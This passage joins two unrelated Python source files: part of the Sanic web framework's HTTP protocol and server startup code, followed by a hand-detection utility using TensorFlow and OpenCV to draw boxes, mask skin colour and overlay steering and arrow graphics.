time_left = self.response_timeout - time_elapsed
self._response_timeout_handler = self.loop.call_later(
time_left, self.response_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(ServiceUnavailable("Response Timeout"))
def keep_alive_timeout_callback(self):
"""
Check if elapsed time since last response exceeds our configured
maximum keep alive timeout value and if so, close the transport
pipe and let the response writer handle the error.
:return: None
"""
time_elapsed = time() - self._last_response_time
if time_elapsed < self.keep_alive_timeout:
time_left = self.keep_alive_timeout - time_elapsed
self._keep_alive_timeout_handler = self.loop.call_later(
time_left, self.keep_alive_timeout_callback
)
else:
logger.debug("KeepAlive Timeout. Closing connection.")
self.transport.close()
self.transport = None
# -------------------------------------------- #
# Parsing
# -------------------------------------------- #
def data_received(self, data):
# Check for the request itself getting too large and exceeding
# memory limits
self._total_request_size += len(data)
if self._total_request_size > self.request_max_size:
self.write_error(PayloadTooLarge("Payload Too Large"))
# Create parser if this is the first time we're receiving data
if self.parser is None:
assert self.request is None
self.headers = []
self.parser = HttpRequestParser(self)
# requests count
self.state["requests_count"] = self.state["requests_count"] + 1
# Parse request chunk or close connection
try:
self.parser.feed_data(data)
except HttpParserError:
message = "Bad Request"
if self._debug:
message += "\n" + traceback.format_exc()
self.write_error(InvalidUsage(message))
def on_url(self, url):
if not self.url:
self.url = url
else:
self.url += url
def on_header(self, name, value):
self._header_fragment += name
if value is not None:
if (
self._header_fragment == b"Content-Length"
and int(value) > self.request_max_size
):
self.write_error(PayloadTooLarge("Payload Too Large"))
try:
value = value.decode()
except UnicodeDecodeError:
value = value.decode("latin_1")
self.headers.append(
(self._header_fragment.decode().casefold(), value)
)
self._header_fragment = b""
def on_headers_complete(self):
self.request = self.request_class(
url_bytes=self.url,
headers=Header(self.headers),
version=self.parser.get_http_version(),
method=self.parser.get_method().decode(),
transport=self.transport,
app=self.app,
)
# Remove any existing KeepAlive handler here,
# It will be recreated if required on the new request.
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
self._keep_alive_timeout_handler = None
if self.request.headers.get(EXPECT_HEADER):
self.expect_handler()
if self.is_request_stream:
self._is_stream_handler = self.router.is_stream_handler(
self.request
)
if self._is_stream_handler:
self.request.stream = StreamBuffer(
self.request_buffer_queue_size
)
self.execute_request_handler()
def expect_handler(self):
"""
Handler for Expect Header.
"""
expect = self.request.headers.get(EXPECT_HEADER)
if self.request.version == "1.1":
if expect.lower() == "100-continue":
self.transport.write(b"HTTP/1.1 100 Continue\r\n\r\n")
else:
self.write_error(
HeaderExpectationFailed(
"Unknown Expect: {expect}".format(expect=expect)
)
)
def on_body(self, body):
if self.is_request_stream and self._is_stream_handler:
# body chunks can be put into asyncio.Queue out of order if
# multiple tasks put concurrently and the queue is full in python
# 3.7. so we should not create more than one task putting into the
# queue simultaneously.
self._body_chunks.append(body)
if (
not self._request_stream_task
or self._request_stream_task.done()
):
self._request_stream_task = self.loop.create_task(
self.stream_append()
)
else:
self.request.body_push(body)
async def stream_append(self):
while self._body_chunks:
body = self._body_chunks.popleft()
if self.request.stream.is_full():
self.transport.pause_reading()
await self.request.stream.put(body)
self.transport.resume_reading()
else:
await self.request.stream.put(body)
def on_message_complete(self):
# Entire request (headers and whole body) is received.
# We can cancel and remove the request timeout handler now.
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
self._request_timeout_handler = None
if self.is_request_stream and self._is_stream_handler:
self._body_chunks.append(None)
if (
not self._request_stream_task
or self._request_stream_task.done()
):
self._request_stream_task = self.loop.create_task(
self.stream_append()
)
return
self.request.body_finish()
self.execute_request_handler()
def execute_request_handler(self):
"""
Invoke the request handler defined by the
:func:`sanic.app.Sanic.handle_request` method
:return: None
"""
self._response_timeout_handler = self.loop.call_later(
self.response_timeout, self.response_timeout_callback
)
self._last_request_time = time()
self._request_handler_task = self.loop.create_task(
self.request_handler(
self.request, self.write_response, self.stream_response
)
)
# -------------------------------------------- #
# Responding
# -------------------------------------------- #
def log_response(self, response):
"""
Helper method provided to enable the logging of responses in case if
the :attr:`HttpProtocol.access_log` is enabled.
:param response: Response generated for the current request
:type response: :class:`sanic.response.HTTPResponse` or
:class:`sanic.response.StreamingHTTPResponse`
:return: None
"""
if self.access_log:
extra = {"status": getattr(response, "status", 0)}
if isinstance(response, HTTPResponse):
extra["byte"] = len(response.body)
else:
extra["byte"] = -1
extra["host"] = "UNKNOWN"
if self.request is not None:
if self.request.ip:
extra["host"] = "{0}:{1}".format(
self.request.ip, self.request.port
)
extra["request"] = "{0} {1}".format(
self.request.method, self.request.url
)
else:
extra["request"] = "nil"
access_logger.info("", extra=extra)
def write_response(self, response):
"""
Writes response content synchronously to the transport.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
self.transport.write(
response.output(
self.request.version, keep_alive, self.keep_alive_timeout
)
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
async def drain(self):
await self._not_paused.wait()
async def push_data(self, data):
self.transport.write(data)
async def stream_response(self, response):
"""
Streams a response to the client asynchronously. Attaches
the transport to the response so the response consumer can
write to the response as needed.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
response.protocol = self
await response.stream(
self.request.version, keep_alive, self.keep_alive_timeout
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
def write_error(self, exception):
# An error _is_ a response.
# Don't throw a response timeout, when a response _is_ given.
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
response = None
try:
response = self.error_handler.response(self.request, exception)
version = self.request.version if self.request else "1.1"
self.transport.write(response.output(version))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before error written @ %s",
self.request.ip if self.request else "Unknown",
)
except Exception as e:
self.bail_out(
"Writing error failed, connection closed {}".format(repr(e)),
from_error=True,
)
finally:
if self.parser and (
self.keep_alive or getattr(response, "status", 0) == 408
):
self.log_response(response)
try:
self.transport.close()
except AttributeError:
logger.debug("Connection lost before server could close it.")
def bail_out(self, message, from_error=False):
"""
In case if the transport pipes are closed and the sanic app encounters
an error while writing data to the transport pipe, we log the error
with proper details.
:param message: Error message to display
:param from_error: If the bail out was invoked while handling an
exception scenario.
:type message: str
:type from_error: bool
:return: None
"""
if from_error or self.transport is None or self.transport.is_closing():
logger.error(
"Transport closed @ %s and exception "
"experienced during error handling",
(
self.transport.get_extra_info("peername")
if self.transport is not None
else "N/A"
),
)
logger.debug("Exception:", exc_info=True)
else:
self.write_error(ServerError(message))
logger.error(message)
def cleanup(self):
"""This is called when KeepAlive feature is used,
it resets the connection in order for it to be able
to handle receiving another request on the same connection."""
self.parser = None
self.request = None
self.url = None
self.headers = None
self._request_handler_task = None
self._request_stream_task = None
self._total_request_size = 0
self._is_stream_handler = False
def close_if_idle(self):
"""Close the connection if a request is not being sent or received
:return: boolean - True if closed, false if staying open
"""
if not self.parser:
self.transport.close()
return True
return False
def close(self):
"""
Force close the connection.
"""
if self.transport is not None:
self.transport.close()
self.transport = None
def trigger_events(events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
class AsyncioServer:
"""
Wraps an asyncio server with functionality that might be useful to
a user who needs to manage the server lifecycle manually.
"""
__slots__ = (
"loop",
"serve_coro",
"_after_start",
"_before_stop",
"_after_stop",
"server",
"connections",
)
def __init__(
self,
loop,
serve_coro,
connections,
after_start,
before_stop,
after_stop,
):
# Note, Sanic already called "before_server_start" events
# before this helper was even created. So we don't need it here.
self.loop = loop
self.serve_coro = serve_coro
self._after_start = after_start
self._before_stop = before_stop
self._after_stop = after_stop
self.server = None
self.connections = connections
def after_start(self):
"""Trigger "after_server_start" events"""
trigger_events(self._after_start, self.loop)
def before_stop(self):
"""Trigger "before_server_stop" events"""
trigger_events(self._before_stop, self.loop)
def after_stop(self):
"""Trigger "after_server_stop" events"""
trigger_events(self._after_stop, self.loop)
def is_serving(self):
if self.server:
return self.server.is_serving()
return False
def wait_closed(self):
if self.server:
return self.server.wait_closed()
def close(self):
if self.server:
self.server.close()
coro = self.wait_closed()
task = asyncio.ensure_future(coro, loop=self.loop)
return task
def __await__(self):
"""Starts the asyncio server, returns AsyncServerCoro"""
task = asyncio.ensure_future(self.serve_coro)
while not task.done():
yield
self.server = task.result()
return self
def serve(
host,
port,
app,
request_handler,
error_handler,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
debug=False,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
ssl=None,
sock=None,
request_max_size=None,
request_buffer_queue_size=100,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
websocket_max_size=None,
websocket_max_queue=None,
websocket_read_limit=2 ** 16,
websocket_write_limit=2 ** 16,
state=None,
graceful_shutdown_timeout=15.0,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param request_handler: Sanic request handler with middleware
:param error_handler: Sanic error handler with middleware
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param debug: enables debug output (slows server)
:param request_timeout: time in seconds
:param response_timeout: time in seconds
:param keep_alive_timeout: time in seconds
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param request_max_size: size in bytes, `None` for no limit
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param protocol: subclass of asyncio protocol class
:param run_async: bool: Do not create a new event loop for the server,
and return an AsyncServer object rather than running it
:param request_class: Request class to use
:param access_log: disable/enable access log
:param websocket_max_size: enforces the maximum size for
incoming messages in bytes.
:param websocket_max_queue: sets the maximum length of the queue
that holds incoming messages.
:param websocket_read_limit: sets the high-water limit of the buffer for
incoming bytes, the low-water limit is half
the high-water limit.
:param websocket_write_limit: sets the high-water limit of the buffer for
outgoing bytes, the low-water limit is a
quarter of the high-water limit.
:param is_request_stream: disable/enable Request.stream
:param request_buffer_queue_size: streaming request buffer queue size
:param router: Router object
:param graceful_shutdown_timeout: How long take to Force close non-idle
connection
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if debug:
loop.set_debug(debug)
app.asgi = False
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
app=app,
request_handler=request_handler,
error_handler=error_handler,
request_timeout=request_timeout,
response_timeout=response_timeout,
keep_alive_timeout=keep_alive_timeout,
request_max_size=request_max_size,
request_buffer_queue_size=request_buffer_queue_size,
request_class=request_class,
access_log=access_log,
keep_alive=keep_alive,
is_request_stream=is_request_stream,
router=router,
websocket_max_size=websocket_max_size,
websocket_max_queue=websocket_max_queue,
websocket_read_limit=websocket_read_limit,
websocket_write_limit=websocket_write_limit,
state=state,
debug=debug,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs
)
if run_async:
return AsyncioServer(
loop,
server_coroutine,
connections,
after_start,
before_stop,
after_stop,
)
trigger_events(before_start, loop)
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
# Register signals for graceful termination
if register_sys_signals:
_singals = (SIGTERM,) if run_multiple else (SIGINT, SIGTERM)
for _signal in _singals:
try:
loop.add_signal_handler(_signal, loop.stop)
except NotImplementedError:
logger.warning(
"Sanic tried to use loop.add_signal_handler "
"but it is not implemented on this platform."
)
pid = os.getpid()
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
# Gracefully shutdown timeout.
# We should provide graceful_shutdown_timeout,
# instead of letting connection hangs forever.
# Let's roughly calcucate time.
start_shutdown = 0
while connections and (start_shutdown < graceful_shutdown_timeout):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
# Force close non-idle connection after waiting for
# graceful_shutdown_timeout
coros = []
for conn in connections:
if hasattr(conn, "websocket") and conn.websocket:
coros.append(conn.websocket.close_connection())
else:
conn.close()
_shutdown = asyncio.gather(*coros, loop=loop)
loop.run_until_complete(_shutdown)
trigger_events(after_stop, loop)
loop.close()
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:param stop_event: if provided, is used as a stop signal
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
server_settings["port"] = None
processes = []
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
for _ in range(workers):
process = Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get("sock").close()
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
from matplotlib import pyplot as plt
from scipy.cluster.vq import vq, kmeans
import time as t
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
# MODEL_NAME = 'hand_inference_graph'
# # Path to frozen detection graph. This is the actual model that is used for the object detection.
# PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# # List of the strings that is used to add correct label for each box.
# PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
#
# NUM_CLASSES = 1
#
# What model to download.
MODEL_NAME = 'hand_detector_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'object-detection.pbtxt')
NUM_CLASSES = 6
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen infrerence graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes ,classes , im_width, im_height, image_np,prev_p1,prev_p2):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 2, 1)
cv2.putText(image_np,str(classes[i]),(int(left)-5, int(top)-5),cv2.FONT_HERSHEY_SIMPLEX,2,255)
width = right - left;
height = bottom - top;
prev_width = prev_p2[0] - prev_p1[0];
prev_height = prev_p2[1] - prev_p1[1];
cv2.circle(image_np,(int(left+width/4),int(top+height/4)), 2, (0,0,255), -1)
cv2.circle(image_np,(int(right-width/4),int(top+height/4)), 2, (0,0,255), -1)
cv2.circle(image_np,(int(left+width/4),int(bottom-height/4)), 2, (0,0,255), -1)
cv2.circle(image_np,(int(right-width/4),int(bottom-height/4)), 2, (0,0,255), -1)
cv2.circle(image_np,(int(right-width/2),int(bottom-height/2)), 2, (0,0,255), -1)
if not prev_p1[0]==0 and not prev_p1[1]==0:
cv2.line(image_np,(int(prev_p1[0]+prev_width/4),int(prev_p1[1]+prev_height/4)),(int(left+width/4),int(top+height/4)),(255,0,0),1)
box_area = image_np[int(top):int(bottom),int(left):int(right),:];
hsv_box_area = cv2.cvtColor(box_area,cv2.COLOR_BGR2HSV);
##plt.ion()
# mean = np.mean(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,:],axis=2)#=255
mean_h = np.mean(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,0])#=255
mean_s = np.mean(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,1])
mean_v = np.mean(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,2])
print 'mean : ',mean_h,mean_s,mean_v
min_h = np.min(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,0])#=255
min_s = np.min(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,1])
min_v = np.min(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,2])
# print 'min : ',min_h,min_s,min_v
max_h = np.max(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,0])#=255
max_s = np.max(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,1])
max_v = np.max(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,2])
# print 'max : ',max_h,max_s,max_v
hue = box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,0]
cv2.imshow("box",cv2.cvtColor(box_area, cv2.COLOR_RGB2BGR));
##plt.clf()
# color = ('b','g','r')
# for i,col in enumerate(color):
# histr = cv2.calcHist([hsv_box_area],[i],None,[256],[0,256])
# np.max(histr)
# plt.plot(histr,color = col)
# plt.xlim([0,256])
# plt.show()
hue, sat, val = hsv_box_area[:,:,0], hsv_box_area[:,:,1], hsv_box_area[:,:,2]
##plt.close("all")
img,h,s,v = do_cluster(hsv_box_area, 3, 3)
# org_img = cv2.cvtColor(box_area, cv2.COLOR_HSV2BGR);
cv2.imshow("clusters",cv2.cvtColor(img, cv2.COLOR_HSV2RGB));
# cv2.imshow("img_s",cv2.cvtColor(org_img, cv2.COLOR_BGR2RGB));
# Normal masking algorithm
lower_skin = np.array([mean_h-45,s-50,0])
upper_skin = np.array([mean_h+45,s+50,255])
# print h,s
mask = cv2.inRange(hsv_box_area,lower_skin, upper_skin)
result = cv2.bitwise_and(box_area,box_area,mask = mask)
cv2.imshow('result',result)
gray = cv2.cvtColor(result, cv2.COLOR_BGR2GRAY)
im_bw = cv2.threshold(gray, 125, 255, cv2.THRESH_BINARY_INV)[1]
cv2.imshow('result1',im_bw)
# new_image = cv2.cvtColor(new_image, cv2.COLOR_HSV2RGB)
# plt.imshow(new_image)
# plt.show()
prev_p1 = p1;
prev_p2 = p2;
return p1,p2
return (0,0),(0,0)
def calculate_intersection(box_1,box_2,im_width,im_height):
(left_1, right_1, top_1, bottom_1) = (box_1[1] * im_width, box_1[3] * im_width,
box_1[0] * im_height, box_1[2] * im_height)
(left_2, right_2, top_2, bottom_2) = (box_2[1] * im_width, box_2[3] * im_width,
box_2[0] * im_height, box_2[2] * im_height)
area_2 = (right_2-left_2)*(bottom_2-top_2)
x = max(left_1, left_2)
y = max(top_1, top_2)
if x <= min(right_1, right_2):
w = min(right_1, right_2) - x
h = min(bottom_1, bottom_2) - y
else:
w=0
h=0
return x,y,w,h,
def is_hand_opened(hand_class):
if hand_class == 5.0 or hand_class == 4.0 or hand_class == 3.0:
return 1
elif hand_class == 6.0:
return 0
else:
return -1
def draw_steering_wheel(img,rotation):
raduis = min(img.shape[0],img.shape[1]);
raduis = (raduis - raduis/6)/2;
wheel_color = (200,200,200);
shift_from_center = 55
# rotation = np.abs(rotation)
# if rotation >= shift_from_center:
# dest = 0
# else:
# dest = np.sqrt(shift_from_center*shift_from_center-rotation*rotation)
# print shift_from_center,rotation,dest
overlay = img.copy()
# (2) draw shapes:
# (3) blend with the original:
opacity = 0.4
cv2.circle(overlay,(int(img.shape[1]/2),int(img.shape[0]/2)), raduis,wheel_color , 3)
cv2.circle(overlay,(int(img.shape[1]/2),int(img.shape[0]/2)), raduis-25,wheel_color, 3)
cv2.line(overlay,(int((img.shape[1]/2)-shift_from_center),int(img.shape[0]/2)+rotation),(int(((img.shape[1]/2))+shift_from_center),int(img.shape[0]/2)-rotation),wheel_color , 3)
cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0, img)
# pts = np.array([[int(((img.shape[1]/2))+dest),int(img.shape[0]/2)+rotation]
# ,[int(((img.shape[1]/2))+dest-10),int(img.shape[0]/2)-10]+rotation,
# [int(((img.shape[1]/2))+dest-10),int(img.shape[0]/2)+10]]+rotation,
# np.int32)
# pts = pts.reshape((-1,1,2))
# cv2.polylines(img,[pts],True,wheel_color,3,-1)
# if rotation>=0:
# cv2.line(img,(int((img.shape[1]/2)-raduis+25+(rotation/4.2)),int(img.shape[0]/2)-10-rotation),(int((img.shape[1]/2)+raduis-25-rotation/3.8),int(img.shape[0]/2)-10+rotation),wheel_color , 3)
# cv2.line(img,(int((img.shape[1]/2)-raduis+25+(rotation/3.8)),int(img.shape[0]/2)+10-rotation),(int((img.shape[1]/2)+raduis-25-rotation/4.2),int(img.shape[0]/2)+10+rotation),wheel_color , 3)
# cv2.line(img,(int((img.shape[1]/2)-25),int(img.shape[0]/2)),(int(((img.shape[1]/2)+25)),int(img.shape[0]/2)+10+rotation),wheel_color , 3)
# else:
# cv2.line(img,(int((img.shape[1]/2)-raduis+25-(rotation/4.2)),int(img.shape[0]/2)-10-rotation),(int((img.shape[1]/2)+raduis-25+rotation/3.8),int(img.shape[0]/2)-10+rotation),wheel_color , 3)
# cv2.line(img,(int((img.shape[1]/2)-raduis+25-(rotation/3.8)),int(img.shape[0]/2)+10-rotation),(int((img.shape[1]/2)+raduis-25+rotation/4.2),int(img.shape[0]/2)+10+rotation),wheel_color , 3)
return img
def draw_right_arrow(img,shift_arrow):
wheel_color = (200,200,200)
shift_from_center = 55
overlay = img.copy()
# (2) draw shapes:
# (3) blend with the original:
opacity = 0.7
cv2.line(overlay,(int((img.shape[1]/2)-shift_from_center+shift_arrow*5),int(img.shape[0]/2)),(int(((img.shape[1]/2))+shift_from_center+shift_arrow*5),int(img.shape[0]/2)),wheel_color , 15)
pts = np.array([[int(((img.shape[1]/2))+shift_from_center+shift_arrow*5)+25,int(img.shape[0]/2)]
,[int(((img.shape[1]/2))+shift_from_center+shift_arrow*5),int(img.shape[0]/2)-25],
[int(((img.shape[1]/2))+shift_from_center+shift_arrow*5),int(img.shape[0]/2)+25]],
np.int32)
pts = pts.reshape((-1,1,2))
# cv2.fillPoly(img,[pts],wheel_color,-1)
cv2.fillPoly(overlay, [pts], wheel_color, 8)
cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0, img)
return img
def draw_left_arrow(img,shift_arrow):
wheel_color = (200,200,200)
shift_from_center = 55
overlay = img.copy()
# (2) draw shapes:
# (3) blend with the original:
opacity = 0.7
cv2.line(overlay,(int((img.shape[1]/2)-shift_from_center-shift_arrow*5),int(img.shape[0]/2)),(int(((img.shape[1]/2))+shift_from_center-shift_arrow*5),int(img.shape[0]/2)),wheel_color , 15)
pts = np.array([[int(((img.shape[1]/2))-shift_from_center-shift_arrow*5)-25,int(img.shape[0]/2)]
,[int(((img.shape[1]/2))-shift_from_center-shift_arrow*5),int(img.shape[0]/2)-25],
[int(((img.shape[1]/2))-shift_from_center-shift_arrow*5),int(img.shape[0]/2)+25]],
np.int32)
pts = pts.reshape((-1,1,2))
# cv2.fillPoly(img,[pts],wheel_color,-1)
cv2.fillPoly(overlay, [pts], wheel_color, 8)
cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0, img)
return img
def draw_up_arrow(img,shift_arrow):
wheel_color = (200,200,200)
shift_from_center = 55
overlay = img.copy()
# (2) draw shapes:
# (3) blend with the original:
opacity = 0.7
cv2.line(overlay,(int((img.shape[1]/2)),int(img.shape[0]/2)-shift_from_center-shift_arrow*5),(int(((img.shape[1]/2))),int(img.shape[0]/2)+shift_from_center-shift_arrow*5),wheel_color , 15)
pts = np.array([[int((img.shape[1]/2)),int((img.shape[0]/2-shift_from_center-shift_arrow*5))-25]
,[int((img.shape[1]/2))-25,int((img.shape[0]/2)-shift_from_center-shift_arrow*5)],
[int((img.shape[1]/2))+25,int((img.shape[0]/2-shift_from_center-shift_arrow*5))]],
np.int32)
pts = pts.reshape((-1,1,2))
# cv2.fillPoly(img,[pts],wheel_color,-1)
cv2.fillPoly(overlay, [pts], wheel_color, 8)
cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0, img)
return img
def draw_down_arrow(img,shift_arrow):
wheel_color = (200,200,200)
shift_from_center = 55
overlay = img.copy()
# (2) draw shapes:
# (3) blend with the original:
opacity = 0.7
cv2.line(overlay,(int((img.shape[1]/2)),int(img.shape[0]/2)-shift_from_center+shift_arrow*5),(int(((img.shape[1]/2))),int(img.shape[0]/2)+shift_from_center+shift_arrow*5),wheel_color , 15)
pts = np.array([[int((img.shape[1]/2)),int((img.shape[0]/2+shift_from_center+shift_arrow*5))+25]
,[int((img.shape[1]/2))-25,int((img.shape[0]/2)+shift_from_center+shift_arrow*5)],
[int((img.shape[1]/2))+25,int((img.shape[0]/2+shift_from_center+shift_arrow*5))]],
np.int32)
pts = pts.reshape((-1,1,2))
# cv2.fillPoly(img,[pts],wheel_color,-1)
cv2.fillPoly(overlay, [pts], wheel_color, 8)
cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0, img)
return img
def check_pattern(list_1, list_2, pattern):
array_list_1 = np.array(list_1)
array_list_2 = np.array(list_2)
array_pattern = np.array(pattern)
if np.array_equal((array_list_1 | array_list_2),array_pattern):
return True;
else:
return False;
def do_cluster(hsv_image, K, channels):
# gets height, width and the number of channes from the image shape
h,w,c = hsv_image.shape
# prepares data for clustering by reshaping the image matrix into a (h*w) x c matrix of pixels
cluster_data = hsv_image.reshape( (h*w,c) )
# grabs the initial time
t0 = t.time()
# performs clustering
codebook, distortion = kmeans(np.array(cluster_data[:,0:channels], dtype=np.float), K)
# takes the final time
t1 = t.time()
print "Clusterization took %0.5f seconds" % (t1-t0)
# calculates the total amount of pixels
tot_pixels = h*w
# generates clusters
data, dist = vq(cluster_data[:,0:channels], codebook)
# calculates the number of elements for each cluster
weights = [len(data[data == i]) for i in range(0,K)]
# creates a 4 column matrix in which the first element is the weight and the other three
# represent the h, s and v values for each cluster
color_rank = np.column_stack((weights, codebook))
# sorts by cluster weight
color_rank = color_rank[np.argsort(color_rank[:,0])]
# print color_rank
# print color_rank[::-1]
# creates a new blank image
new_image = np.array([0,0,255], dtype=np.uint8) * np.ones( (200, 200, 3), dtype=np.uint8)
img_height = new_image.shape[0]
